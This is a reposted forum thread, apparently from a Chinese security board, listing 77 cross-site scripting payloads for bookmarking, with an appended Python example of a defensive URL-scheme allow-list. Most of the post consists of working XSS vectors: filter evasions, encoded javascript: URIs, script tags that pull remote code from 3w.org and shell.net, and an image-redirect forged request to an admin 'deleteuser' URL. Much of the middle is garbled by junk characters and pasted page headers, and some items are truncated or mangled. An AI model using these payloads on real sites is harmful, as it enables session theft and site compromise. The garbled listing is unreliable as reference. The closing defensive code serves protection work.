XSS Attack Roundup

OP
Posted on 2013-4-19 19:22:37
It seems t00ls has relatively little material on XSS, so I'm copying over some good stuff I came across; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up "javascript"
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up "javascript"
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
  ?% U4 C# ^2 Y( A; k' B. b(17)空字符12-7-1 T00LS - Powered by Discuz! Board, F8 T+ L2 Q* [& C4 `
https://www.t00ls.net/viewthread ... table&tid=15267 2/66 w. y: a$ M4 k1 a& _" R) |
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' S; Q$ y, e1 E( m9 [% C
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 g, J% M) `# \+ g, P
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 {: U3 D7 j& J3 x( l) A2 ]' k
(19)Spaces和meta前的IMG标签# ?# y# W* y) B8 a5 }+ s0 Z
<IMG SRC=” javascript:alert(‘XSS’);”>- Y# z* i+ e0 V0 ^% K  o
(20)Non-alpha-non-digit XSS
! ?/ Q- w% q( @4 t<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% r7 X" j! b8 y& V
(21)Non-alpha-non-digit XSS to 28 N" A& q3 q/ ]7 h% V; n* S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 ]" k* D4 o: z, F(22)Non-alpha-non-digit XSS to 34 v. x, a% l1 C9 F
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ v+ f" d3 j7 d7 u/ }, f$ B2 h3 a
(23)双开括号* j! B0 i+ {3 E4 Z9 ^
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 ^/ [7 D0 o$ `( p$ U(24)无结束脚本标记(仅火狐等浏览器)
9 ]; k3 [* u3 D! K1 ?<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- O/ e- e0 l. Y0 n$ G(25)无结束脚本标记2
3 _! I0 C: m  G# d$ v, o: ]<SCRIPT SRC=//3w.org/XSS/xss.js>& y) }/ p0 L1 A6 K6 [2 z
(26)半开的HTML/JavaScript XSS3 m1 M( q3 z, W5 ?# T2 g% `
<IMG SRC=”javascript:alert(‘XSS’)”, Z3 r( F) d; K; v
(27)双开角括号
8 P$ |, Y2 g2 z<iframe src=http://3w.org/XSS.html <! {/ Y& Y+ I5 x2 \! V, G' x4 y3 `
(28)无单引号 双引号 分号, [4 u. }3 U7 t: T/ [8 [0 L
<SCRIPT>a=/XSS/, x# k$ c3 }# T0 p% {! E
alert(a.source)</SCRIPT>' k; @) Q+ P' R! ]5 q/ }- R8 j  ?
(29)换码过滤的JavaScript. `& _6 K+ |/ Y/ V& g) o' U
\”;alert(‘XSS’);//
$ I' h2 _! r" @0 M4 |' I, c(30)结束Title标签
" _* f1 M! a  B/ Y7 N</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ X( c, @+ U! w& ]: n; G4 I
(31)Input Image" t7 J+ y3 I( p( s& B1 P
<INPUT SRC=”javascript:alert(‘XSS’);”>9 @7 a+ U6 ^, J# c7 _; ?/ H# ?7 o8 b
(32)BODY Image2 o" X6 @; F- u5 k
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 m! R* C$ m0 ?2 {+ _- U(33)BODY标签. t; E$ c: R9 Z/ C8 J
<BODY(‘XSS’)>
) O2 `: r) G6 v. h1 c8 l1 t7 _(34)IMG Dynsrc. c/ Y3 o( r( {- Q* [$ C
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 {9 I: m; G: C) L2 V(35)IMG Lowsrc
8 u8 G1 _; o1 p& v. i5 M5 f* |4 ?<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ C  X% E! e/ D. a% {0 p1 c# X
(36)BGSOUND
) f' k+ P+ F+ K# d$ _" W% [" P<BGSOUND SRC=”javascript:alert(‘XSS’);”>) Z  l! o0 n5 ^& a% e
(37)STYLE sheet
3 ~/ _3 E6 ~7 |0 F<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 r6 S3 E9 A5 P(38)远程样式表* E2 b. v; w, A$ B
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& }7 P7 _3 \; G/ F! q
(39)List-style-image(列表式)
) g: \% f- T  e- t, E0 d<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 i& B$ ]6 ?7 Y(40)IMG VBscript
7 {1 R, d. U6 o# h<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 n: U$ G) m+ Z1 Z6 i3 p$ N/ }(41)META链接url
* }' i: ^/ G$ o) l- r
. N% L7 \/ v2 U6 e
' c8 B3 X% n! e6 Y. Y<META HTTP-EQUIV=”refresh” CONTENT=”0;
( o% W' @) S# c' }/ H" G4 XURL=http://;URL=javascript:alert(‘XSS’);”>
2 v  _0 w7 L# K- @(42)Iframe
3 @. i- i0 v: x<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>, b( W" u* N4 j* }; \
(43)Frame
- n) ^. g" B/ g" v' b, S<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board% c* Q4 \, L3 K# {4 m
https://www.t00ls.net/viewthread ... table&tid=15267 3/61 j1 u  P0 ]5 U$ H0 |/ T
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute, split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
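Added editor's example in Python (not from the post above or the cheat sheet it copies): a defensive allow-list check for URL-valued attributes (src, href, background) that canonicalizes the value the way a browser does before reading the scheme, so the mixed-case (4), entity-encoded (5, 8-10), embedded-whitespace (11-14, 19), NUL (17) and extra-character (47) variants above all collapse to the same javascript: scheme and are rejected. The allowed-scheme set and the sample values are assumptions constructed for this example.

```python
import html
import re

# Characters a browser drops or ignores in and around a URL scheme: controls
# 1-32 (tab, LF, CR, NUL among them), DEL, NBSP (160), U+2000-2008, U+3000,
# U+FEFF. This is the character set item (47) above lists.
_JUNK = re.compile(r"[\x00-\x20\x7f\xa0\u2000-\u2008\u3000\ufeff]")
# Schemes an application chooses to allow in src/href-style attributes
# (assumed allow-list for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def canonicalize_url(value: str) -> str:
    """Decode entities (named, decimal and hex, with or without the ';')
    and strip the junk characters, so 'jav&#x0A;ascript:' and
    'java\\x00script:' both come out as 'javascript:'."""
    return _JUNK.sub("", html.unescape(value))


def url_is_safe(value: str) -> bool:
    """True if the canonical value has no scheme (relative or //host form)
    or a scheme on the allow-list; anything else (javascript:, vbscript:,
    data: and so on) is rejected."""
    cleaned = canonicalize_url(value)
    if not cleaned:
        return False
    m = _SCHEME.match(cleaned)
    if m is None:
        return True
    return m.group(1).lower() in ALLOWED_SCHEMES


# Constructed samples, taken from the attribute values of the vectors above,
# mapped to the verdict a correct check must reach.
SAMPLES = {
    "JaVaScRiPt:alert('XSS')": False,                     # (4) mixed case
    "jav\tascript:alert('XSS');": False,                  # (11) embedded tab
    "jav&#x0A;ascript:alert('XSS');": False,              # (12) encoded newline
    "java\x00script:alert('XSS')": False,                 # (17) NUL byte
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A": False,  # (10) hex, no ';'
    " javascript:alert('XSS');": False,                   # (19) leading space
    "vbscript:msgbox(\"XSS\")": False,                    # (40) VBScript
    "http://3w.org/XSS/xss.js": True,                     # ordinary http URL
    "//www.google.com/": True,                            # (74) scheme-relative
    "http://3232235521": True,                            # (70) decimal IP
}


def check_samples() -> dict:
    """Return {sample: True} where url_is_safe() matches the expected verdict."""
    return {v: url_is_safe(v) == want for v, want in SAMPLES.items()}
```

The scheme check covers only the URL part of the defence; the value must still be attribute-encoded when written back into HTML, otherwise vectors such as (6) and (61) to (66), which break out of the attribute instead of abusing the scheme, are unaffected.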